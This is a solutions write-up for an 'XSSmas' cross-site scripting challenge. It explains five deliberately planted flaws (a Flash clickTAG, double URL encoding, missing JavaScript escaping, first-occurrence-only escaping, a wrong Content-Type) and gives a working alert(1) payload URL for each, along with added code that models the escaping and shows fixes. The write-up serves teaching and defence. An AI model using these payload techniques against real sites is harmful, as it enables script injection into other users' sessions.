Solutions

These are the intended XSS vulnerabilities. Some of the solutions will be blocked by your browser's XSS protection.

There might be one more :-)

Visitor fun facts:

Number of countries: 44
Top 3 visiting countries: India (18.50%), USA (14.99%), Norway (10.53%)
Average time on page: 00:04:45
Top 3 browsers: Chrome (52.3%), Firefox (31.9%), Safari (4.94%)
Top 3 OS: Windows (61.56%), OS X (13.72%), Linux (12.76%)
Java enabled: 72.57%
Vulnerable Flash version: at least 10%

1. Flash based XSS

This is a classic XSS error found in loads of Flash ads. They take a parameter called clickTAG, which lets the embedding party decide later which link the ad should forward to when clicked:
<object width="500" height="100">
<param name="movie" value="xssmas.swf?clickTAG=gifts.html">
<embed src="xssmas.swf?clickTAG=gifts.html" 
width="500" height="100">
</embed>
</object>
However, because the SWF can be requested directly, the clickTAG value can be supplied in the URL. The ad navigates to whatever the parameter holds without checking its scheme, so a javascript: URL runs in the origin that serves the SWF:
http://research.insecurelabs.org/xssmas/xssmas.swf?clickTAG=javascript:alert(1)
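As an added example (not code from the original post), here is the check a clickTAG handler should make before navigating, written in JavaScript rather than the ActionScript a SWF would use before calling getURL()/navigateToURL(). The SWF URL is the one from the post; the function names and the optional host allowlist are assumptions.

```javascript
// Added example, not code from the original post: the check a clickTAG
// handler should perform before navigating. A SWF would do this in
// ActionScript; the same logic is shown here in JavaScript. SWF_URL is the
// post's ad; the function names and the optional host allowlist are
// assumptions for illustration.

const SWF_URL = "http://research.insecurelabs.org/xssmas/xssmas.swf";

// Resolve the clickTAG against the ad's own URL (so the relative
// "gifts.html" from the embed still works) and accept only http(s).
// javascript:, data:, vbscript: and unparsable values return null.
// With allowedHosts set, the destination must also be on a listed host,
// which stops the ad from being used as an open redirect.
function safeClickTarget(clickTag, swfUrl, allowedHosts) {
  let target;
  try {
    target = new URL(clickTag, swfUrl); // WHATWG parser: trims whitespace,
  } catch {                             // lower-cases the scheme
    return null;
  }
  if (target.protocol !== "http:" && target.protocol !== "https:") return null;
  if (allowedHosts && !allowedHosts.includes(target.hostname)) return null;
  return target.href;
}

// The clickTAG as the player sees it when the SWF is loaded directly with a
// query string, as in the post's URL.
function clickTagFromSwfUrl(swfUrlWithQuery) {
  return new URL(swfUrlWithQuery).searchParams.get("clickTAG");
}

// Where the ad would navigate for a given SWF URL, or null if it must refuse.
function decide(swfUrlWithQuery, allowedHosts) {
  const tag = clickTagFromSwfUrl(swfUrlWithQuery);
  return tag === null ? null : safeClickTarget(tag, swfUrlWithQuery, allowedHosts);
}
```

The scheme check alone is what stops the javascript: payload; without the host allowlist the ad will still happily send visitors to any http(s) site the embedding page names, which is the intended clickTAG behaviour but worth knowing when the SWF is reachable directly.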

2. DOM-based XSS

This one combines reflected and DOM-based XSS. The JavaScript receives a variable n whose value comes from a URL parameter. The server partially escapes the value and writes it into a string literal; the page then URL-decodes it again with unescape() and inserts it with jQuery's html(), which parses it as HTML.

<script>
// n is filled in server-side from the URL parameter, after the partial escaping
var n = '';
if (n != '') {
	$(function() {
		$("h1").html("Merry XSSmas, " + unescape(n) + "!");
	});
}
</script>

The escaping runs on the value after the server has URL-decoded it once, but unescape() decodes it a second time in the browser. Double URL encoding the payload therefore gets it past the escaping as harmless %-sequences, and unescape() turns them back into markup:

http://research.insecurelabs.org/xssmas/?n=%253Cscript%253Ealert%25281%2529%253C/script%253E

There might be another vulnerability here as well. The partial escaping covers these characters: ' < > /. It does not escape the backslash, so a value of \' becomes \\' in the output: the JavaScript parser reads \\ as a literal backslash, and the ' that follows terminates the string. Has anybody found a solution for this one?

3. and 4. Reflected XSS and DOM-based XSS

The fake script below pretends to do analytics, but there are two big mistakes in it. The escaping in use is HTML escaping only, when this is clearly a JavaScript string inside HTML, a context that needs both layers ("query string" marks where the server inserts the escaped query string):

<script>
<!-- Analytics: no change below this line -->
document.write('<img src="analytics?url=query string">');
</script>

So the first vulnerability is the lack of JavaScript escaping. A single quote breaks out of the string, after which we can run arbitrary JavaScript (the + signs are sent as %2B so they survive URL decoding):

http://research.insecurelabs.org/xssmas/?n'%2Balert(1)%2B'

The second problem is that the escaping uses replace instead of replaceAll by mistake, so only the first occurrence of each of <, > and " is escaped. Sacrifice one of each at the start of the payload and the rest goes through untouched: the second " closes the src attribute, the > closes the img tag, and the script tag after it is written into the page as live markup, with the trailing /* turning whatever follows inside the injected script into a comment:

http://research.insecurelabs.org/xssmas/?%22%3C%3E%22%3E%3Cscript%3Ealert(1)/*
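The following is an added example, not code from the original post: a small model of the two server-side escaping routines described above, the "n" greeting from section 2 and the analytics beacon from sections 3 and 4, so the bypasses can be stepped through offline. The server code is reconstructed from the post's description; how the challenge actually rewrote <, > and / in section 2 is not stated, so that part (entity-encoding the angle brackets, backslash-escaping the slash) and all function names are assumptions. A corrected emitter for the beacon is included for comparison.

```javascript
// Added example, not code from the original post: a model of the two
// server-side escaping routines described above (the "n" greeting from
// section 2 and the analytics beacon from sections 3 and 4), the script
// each one emits, and what a browser makes of it. The server code is
// reconstructed from the post's description; the exact transformations
// and all function names here are assumptions.

// One level of URL decoding, as the web server applies to query parameters.
function serverDecode(raw) {
  return decodeURIComponent(raw.replace(/\+/g, " "));
}

// Reads one single- or double-quoted JS string literal from the start of
// `src` and returns its value plus the source text left after the closing
// quote. If the leftover is more than the template's own tail, the payload
// terminated the literal early. Only identity escapes (\x -> x) are handled;
// that covers everything the escapers modelled below produce.
function readStringLiteral(src) {
  const quote = src[0];
  if (quote !== "'" && quote !== '"') throw new Error("expected a quote");
  let value = "";
  for (let i = 1; i < src.length; i++) {
    const c = src[i];
    if (c === "\\") { value += src[++i]; continue; }
    if (c === quote) return { value, leftover: src.slice(i + 1) };
    value += c;
  }
  throw new Error("unterminated string literal");
}

// Section 2. The post says ' < > / are escaped, the backslash is not, and
// ' becomes \'. How < > / were rewritten is not stated; modelled here
// (assumption) as &lt; &gt; for the angle brackets and \/ for the slash,
// which reproduces both behaviours the post describes.
function partialEscape(s) {
  return s.replace(/'/g, "\\'").replace(/</g, "&lt;")
          .replace(/>/g, "&gt;").replace(/\//g, "\\/");
}

// The literal's value is URL-decoded a second time by unescape() and handed
// to jQuery's html(), i.e. parsed as HTML.
function renderGreeting(rawParam) {
  const stmt = `var n = '${partialEscape(serverDecode(rawParam))}';`;
  const { value, leftover } = readStringLiteral(stmt.slice("var n = ".length));
  return {
    html: "Merry XSSmas, " + unescape(value) + "!",
    brokeOut: leftover !== ";", // the template's own tail is just ";"
    leftover,
  };
}

// Sections 3 and 4. HTML-only escaping, and replace() with a string pattern
// rewrites only the FIRST occurrence of each character.
function htmlEscapeFirstOnly(s) {
  return s.replace("<", "&lt;").replace(">", "&gt;").replace('"', "&quot;");
}

// The markup document.write would emit, or a breakout if the literal ended
// early (the query string is used raw here, no URL decoding involved).
function analyticsResult(queryString) {
  const stmt = `document.write('<img src="analytics?url=${htmlEscapeFirstOnly(queryString)}">');`;
  const { value, leftover } = readStringLiteral(stmt.slice("document.write(".length));
  return { markup: value, brokeOut: leftover !== ");", leftover };
}

// A corrected emitter for the beacon: encode the value for the URL it is
// placed in, then let JSON.stringify produce the whole JS literal (quotes,
// backslashes and control characters escaped). Neither layer can be broken
// out of by the query string. Dropping document.write entirely is better still.
function safeAnalyticsResult(queryString) {
  const markup = '<img src="analytics?url=' + encodeURIComponent(queryString) + '">';
  const stmt = `document.write(${JSON.stringify(markup)});`;
  const { value, leftover } = readStringLiteral(stmt.slice("document.write(".length));
  return { markup: value, brokeOut: leftover !== ");" };
}
```

Run it in Node: renderGreeting and analyticsResult return what the h1 or document.write would receive and whether the string literal was terminated early, so the single-encoded, double-encoded and \' inputs for section 2 and the two section 3/4 payloads can be compared side by side. The same two-layer fix applies to the greeting: build the literal with JSON.stringify and use jQuery's text() instead of html(), since the name is data, not markup.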

5. Wrong Content-Type

The search field loads a JSON feed of search results, which also echoes the query as part of the response. When the search result URL is opened directly, the response comes with an HTML content type rather than application/json, so the browser renders it as HTML. A single script tag in the query is therefore enough to get execution (the fix is to send Content-Type: application/json, ideally with X-Content-Type-Options: nosniff, and to escape the echoed query):

http://research.insecurelabs.org/xssmas/search.php?query=%3Cscript%3Ealert(1)%3C/script%3E

Other

Some people sent me solutions using the URL http://research.insecurelabs.org/xssmas/index/analytics. This is simply a different way of referencing the same index.php as http://research.insecurelabs.org/xssmas/. The page looks different because the relative references to the JavaScript and the stylesheet do not resolve when it is loaded this way.